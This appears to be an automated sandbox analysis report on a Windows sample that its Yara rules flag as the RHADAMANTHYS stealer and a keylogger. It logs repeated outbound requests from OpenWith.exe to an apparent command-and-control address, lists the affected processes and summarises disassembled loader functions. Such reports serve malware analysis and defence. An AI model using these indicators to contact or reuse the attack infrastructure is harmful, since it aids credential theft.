                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: 2ku58F9dUSVrZha
                      2024-05-23 18:16:32 UTC170INHTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:16:32 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:16:32 UTC166INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      12192.168.2.64971994.156.8.2324431880C:\Windows\System32\OpenWith.exe
                      TimestampBytes transferredDirectionData
                      2024-05-23 18:16:39 UTC469OUTGET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: kvd5dMCTf5mbuop
                      2024-05-23 18:16:39 UTC170INHTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:16:39 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:16:39 UTC166INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      13192.168.2.64972094.156.8.2324431880C:\Windows\System32\OpenWith.exe
                      TimestampBytes transferredDirectionData
                      2024-05-23 18:16:45 UTC469OUTGET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: EbWxOS52DLQr2vF
                      2024-05-23 18:16:45 UTC170INHTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:16:45 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:16:45 UTC166INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      14192.168.2.64972194.156.8.2324431880C:\Windows\System32\OpenWith.exe
                      TimestampBytes transferredDirectionData
                      2024-05-23 18:16:51 UTC469OUTGET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: f5cmLiHAmSPq8o0
                      2024-05-23 18:16:51 UTC170INHTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:16:51 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:16:51 UTC166INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      15192.168.2.64972294.156.8.2324431880C:\Windows\System32\OpenWith.exe
                      TimestampBytes transferredDirectionData
                      2024-05-23 18:16:57 UTC469OUTGET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: oqscagi87YhXdh9
                      2024-05-23 18:16:58 UTC170INHTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:16:58 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:16:58 UTC166INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      16192.168.2.64972394.156.8.2324431880C:\Windows\System32\OpenWith.exe
                      TimestampBytes transferredDirectionData
                      2024-05-23 18:17:04 UTC469OUTGET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: IDbbhmNh0FLcLVU
                      2024-05-23 18:17:04 UTC170INHTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:17:04 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:17:04 UTC166INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:14:14:58
                      Start date:23/05/2024
                      Path:C:\Users\user\Desktop\wdeeFKntav.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\wdeeFKntav.exe"
                      Imagebase:0xc70000
                      File size:447'488 bytes
                      MD5 hash:E1BECE7BA20DBB8100100F8CFF2C415D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000000.00000003.2110064787.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000000.00000003.2113793924.0000000003C80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:2
                      Start time:14:15:03
                      Start date:23/05/2024
                      Path:C:\Windows\SysWOW64\dialer.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\system32\dialer.exe"
                      Imagebase:0x610000
                      File size:32'256 bytes
                      MD5 hash:E4BD77FB64DDE78F1A95ECE09F6A9B85
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000002.00000003.2114030735.0000000002B90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000002.00000002.2241149327.0000000004570000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate
                      Has exited:true

                      General

                      Target ID:3
                      Start time:14:15:15
                      Start date:23/05/2024
                      Path:C:\Windows\System32\OpenWith.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\system32\openwith.exe"
                      Imagebase:0x7ff7f2200000
                      File size:123'984 bytes
                      MD5 hash:E4A834784FA08C17D47A1E72429C5109
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate
                      Has exited:false

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:2.5%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:45.2%
                        Total number of Nodes:42
                        Total number of Limit Nodes:1
                        execution_graph 1176 cc08ce __set_app_type __p__fmode __p__commode 1177 cc093d 1176->1177 1178 cc0945 __setusermatherr 1177->1178 1179 cc0951 1177->1179 1178->1179 1188 cc0a2c _controlfp 1179->1188 1181 cc0956 _initterm __getmainargs _initterm 1182 cc09aa GetStartupInfoA 1181->1182 1184 cc09de GetModuleHandleA 1182->1184 1189 cc0fe0 1184->1189 1188->1181 1192 cc0aa0 HeapCreate 1189->1192 1193 cc0a02 exit _XcptFilter 1192->1193 1194 cc0ac1 HeapAlloc 1192->1194 1195 cc0b07 GetModuleHandleA HeapAlloc 1194->1195 1196 cc0e31 HeapDestroy 1194->1196 1197 cc0b34 1195->1197 1196->1193 1197->1196 1212 cc0e50 GetProcessHeap RtlAllocateHeap 1197->1212 1199 cc0db4 WaitForSingleObject FindCloseChangeNotification 1200 cc0dd2 1199->1200 1200->1196 1201 cc0e07 VirtualFree 1200->1201 1202 cc0e13 GetProcessHeap HeapFree 1200->1202 1201->1202 1202->1196 1202->1200 1203 cc0b53 1203->1199 1203->1203 1204 cc0c06 HeapAlloc 1203->1204 1204->1199 1208 cc0c1b 1204->1208 1205 cc0da3 HeapFree 1205->1199 1206 cc0d9f 1206->1205 1207 cc0d11 GetProcessHeap HeapAlloc 1207->1208 1210 cc0d2d memcpy 1207->1210 1208->1205 1208->1206 1208->1207 1209 cc0ccf GetProcessHeap RtlAllocateHeap 1208->1209 1209->1208 1211 cc0cef memcpy 1209->1211 1210->1208 1211->1208 1213 cc0fae 1212->1213 1214 cc0e7a memset GetModuleFileNameW 1212->1214 1213->1203 1215 cc0fbe GetProcessHeap HeapFree 1214->1215 1216 cc0ea7 wcsrchr 1214->1216 1215->1213 1216->1215 1217 cc0ec0 wcschr 1216->1217 1218 cc0ed7 lstrlenW 1217->1218 1219 cc0ed2 1217->1219 1220 cc0ee9 memset 1218->1220 1221 cc0f86 RtlFreeHeap MulDiv 1218->1221 1219->1218 1223 cc0f00 1220->1223 1221->1213 1224 cc0f54 1223->1224 1225 cc0f35 wcschr 1223->1225 1224->1221 1226 cc0f68 HeapFree 1224->1226 1225->1221 1225->1223 1226->1203

                        Executed Functions

                        Function 00CC0AA0 Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 275memorysynchronizationCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 cc0aa0-cc0abb HeapCreate 1 cc0e3d-cc0e40 0->1 2 cc0ac1-cc0b01 HeapAlloc 0->2 3 cc0b07-cc0b39 GetModuleHandleA HeapAlloc 2->3 4 cc0e31-cc0e3c HeapDestroy 2->4 3->4 6 cc0b3f-cc0b58 call cc0e50 3->6 4->1 9 cc0b5e-cc0b63 6->9 10 cc0db4-cc0dd0 WaitForSingleObject FindCloseChangeNotification 6->10 9->10 11 cc0b69-cc0b93 call c71000 9->11 12 cc0de6-cc0df4 10->12 13 cc0dd2-cc0dd4 10->13 21 cc0bf9-cc0c00 11->21 22 cc0b95-cc0ba8 11->22 12->4 16 cc0df6-cc0e05 12->16 13->12 15 cc0dd6-cc0dd8 13->15 15->12 18 cc0dda-cc0ddf 15->18 19 cc0e07-cc0e11 VirtualFree 16->19 20 cc0e13-cc0e2f GetProcessHeap HeapFree 16->20 18->12 19->20 20->4 20->16 21->10 24 cc0c06-cc0c15 HeapAlloc 21->24 23 cc0bb0-cc0bde 22->23 23->23 25 cc0be0-cc0bf6 23->25 24->10 26 cc0c1b-cc0c37 24->26 25->21 27 cc0c69-cc0c71 26->27 28 cc0c39 26->28 30 cc0c77-cc0c7e 27->30 31 cc0da3-cc0db0 HeapFree 27->31 29 cc0c40-cc0c43 28->29 33 cc0c45-cc0c4d 29->33 34 cc0c52-cc0c63 29->34 30->31 32 cc0c84-cc0ca7 30->32 31->10 35 cc0cad 32->35 36 cc0d9f 32->36 33->34 34->29 37 cc0c65 34->37 38 cc0cb0-cc0cb7 35->38 36->31 37->27 39 cc0cbd-cc0cc2 38->39 40 cc0d4f-cc0d58 38->40 41 cc0cc4-cc0cc9 39->41 42 cc0d11-cc0d2b GetProcessHeap HeapAlloc 39->42 43 cc0d5a-cc0d7f call cc1050 40->43 44 cc0d8b-cc0d99 40->44 41->44 45 cc0ccf-cc0ce9 GetProcessHeap RtlAllocateHeap 41->45 46 cc0d2d-cc0d4d memcpy 42->46 47 cc0d87 42->47 43->47 44->36 44->38 45->47 49 cc0cef-cc0d0f memcpy 45->49 46->47 47->44 49->47
                        APIs
                        • HeapCreate.KERNELBASE(00000000,00100000,01000000,?,?,?,?,?,?,?,00CC0FEE,00CC0A02,00CD20E0,00CC0A02,00000000), ref: 00CC0AAF
                        • HeapAlloc.KERNEL32 ref: 00CC0AF7
                        • GetModuleHandleA.KERNEL32(00000000), ref: 00CC0B09
                        • HeapAlloc.KERNEL32(00000000,00000008,0004B000), ref: 00CC0B21
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CC0B2E
                          • Part of subcall function 00CC0E50: GetProcessHeap.KERNEL32(00000000,3B9ACA00,00000000,77355E70,00000000,00000000), ref: 00CC0E67
                          • Part of subcall function 00CC0E50: RtlAllocateHeap.NTDLL(00000000), ref: 00CC0E6A
                          • Part of subcall function 00CC0E50: memset.MSVCRT ref: 00CC0E85
                          • Part of subcall function 00CC0E50: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00CC0E99
                          • Part of subcall function 00CC0E50: wcsrchr.MSVCRT ref: 00CC0EAE
                          • Part of subcall function 00CC0E50: wcschr.MSVCRT ref: 00CC0EC3
                          • Part of subcall function 00CC0E50: lstrlenW.KERNEL32(-00000002), ref: 00CC0ED8
                          • Part of subcall function 00CC0E50: memset.MSVCRT ref: 00CC0EF2
                          • Part of subcall function 00CC0E50: wcschr.MSVCRT ref: 00CC0F3B
                        • HeapAlloc.KERNEL32(?,00000008,00000000,?,?,?,?,?,?,?,?,?,?,00CC0FEE,00CC0A02,00CD20E0), ref: 00CC0C0D
                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,00CC0FEE,00CC0A02,00CD20E0,00CC0A02), ref: 00CC0CD8
                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,?,?,?,?,00CC0FEE,00CC0A02,00CD20E0,00CC0A02,00000000), ref: 00CC0CDF
                        • memcpy.MSVCRT ref: 00CC0D03
                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,00CC0FEE,00CC0A02,00CD20E0,00CC0A02), ref: 00CC0D1A
                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00CC0FEE,00CC0A02,00CD20E0,00CC0A02,00000000), ref: 00CC0D21
                        • memcpy.MSVCRT ref: 00CC0D41
                        • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00CC0FEE,00CC0A02,00CD20E0), ref: 00CC0DAA
                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,00CC0FEE,00CC0A02,00CD20E0,00CC0A02,00000000), ref: 00CC0DBC
                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00CC0FEE,00CC0A02,00CD20E0,00CC0A02,00000000,?,0000000A), ref: 00CC0DC5
                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00CC0E11
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00CC0E16
                        • HeapFree.KERNEL32(00000000), ref: 00CC0E1D
                        • HeapDestroy.KERNELBASE(0000003C), ref: 00CC0E35
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2114201513.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2114189080.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2114231770.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2114246339.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2114260102.0000000000CDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_wdeeFKntav.jbxd
                        Similarity
                        • API ID: Heap$AllocProcess$Free$AllocateCreateModulememcpymemsetwcschr$ChangeCloseDestroyEventFileFindHandleNameNotificationObjectSingleVirtualWaitlstrlenwcsrchr
                        • String ID: 0/#v
                        • API String ID: 1416928203-3853616392
                        • Opcode ID: e28ab7b9ddf81275af0709105827c14a9a4ad7cbfd010e32d0268b30110103cc
                        • Instruction ID: b1af3064125293405db1cbe933a41c808026e89343eb427bb0509392cfc2c298
                        • Opcode Fuzzy Hash: e28ab7b9ddf81275af0709105827c14a9a4ad7cbfd010e32d0268b30110103cc
                        • Instruction Fuzzy Hash: 76B18770A04345DBDB24DFA8CC44B2ABBE5BB98304F14892EF99A87291DB70E944CB51
                        Function 00CC0E50 Relevance: 21.1, APIs: 14, Instructions: 139memorystringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 51 cc0e50-cc0e74 GetProcessHeap RtlAllocateHeap 52 cc0fca-cc0fd6 51->52 53 cc0e7a-cc0ea1 memset GetModuleFileNameW 51->53 54 cc0fbe-cc0fc4 GetProcessHeap HeapFree 53->54 55 cc0ea7-cc0eba wcsrchr 53->55 54->52 55->54 56 cc0ec0-cc0ed0 wcschr 55->56 57 cc0ed7-cc0ee3 lstrlenW 56->57 58 cc0ed2-cc0ed4 56->58 59 cc0ee9-cc0efc memset 57->59 60 cc0f86-cc0fac RtlFreeHeap MulDiv 57->60 58->57 61 cc0f00-cc0f0c 59->61 60->52 64 cc0fae-cc0fbd 60->64 61->61 63 cc0f0e 61->63 65 cc0f10-cc0f27 63->65 65->65 66 cc0f29-cc0f33 65->66 67 cc0f54-cc0f57 66->67 68 cc0f35-cc0f45 wcschr 66->68 70 cc0f68-cc0f85 HeapFree 67->70 71 cc0f59-cc0f5c 67->71 68->60 69 cc0f47-cc0f52 68->69 69->67 69->68 71->70 72 cc0f5e-cc0f61 71->72 72->70 73 cc0f63-cc0f66 72->73 73->60 73->70
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,3B9ACA00,00000000,77355E70,00000000,00000000), ref: 00CC0E67
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CC0E6A
                        • memset.MSVCRT ref: 00CC0E85
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00CC0E99
                        • wcsrchr.MSVCRT ref: 00CC0EAE
                        • wcschr.MSVCRT ref: 00CC0EC3
                        • lstrlenW.KERNEL32(-00000002), ref: 00CC0ED8
                        • memset.MSVCRT ref: 00CC0EF2
                        • wcschr.MSVCRT ref: 00CC0F3B
                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00CC0F73
                        • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00CC0F91
                        • MulDiv.KERNEL32(00000001,80000000,80000000), ref: 00CC0FA3
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CC0FC1
                        • HeapFree.KERNEL32(00000000), ref: 00CC0FC4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2114201513.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2114189080.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2114231770.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2114246339.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2114260102.0000000000CDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_wdeeFKntav.jbxd
                        Similarity
                        • API ID: Heap$Free$Processmemsetwcschr$AllocateFileModuleNamelstrlenwcsrchr
                        • String ID:
                        • API String ID: 2120544777-0
                        • Opcode ID: 74c4977c3a8c28c2b484890788ac5973896c350b7fae32537a37b4b4789655cc
                        • Instruction ID: 2a16a421725601959aa22796231f1d26b70c6b495ad57fbbcf4fbc932e191754
                        • Opcode Fuzzy Hash: 74c4977c3a8c28c2b484890788ac5973896c350b7fae32537a37b4b4789655cc
                        • Instruction Fuzzy Hash: 1B412631A0030597E730A7A4EC85FBE73A8EB85751F24002FFE05D61C1EA69EA85C271
                        Function 00CC08CE Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2114201513.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2114189080.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2114231770.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2114246339.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2114260102.0000000000CDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_wdeeFKntav.jbxd
                        Similarity
                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                        • String ID:
                        • API String ID: 801014965-0
                        • Opcode ID: c591d708b08f0897b8ec15a5cffd47e08d1ff9bb0ef82714b3fa6fe5c0028ade
                        • Instruction ID: ba4eab9a2a0f1ca92ab512f4fc005a18d9cca64520bb280d0063adf4d1b844f4
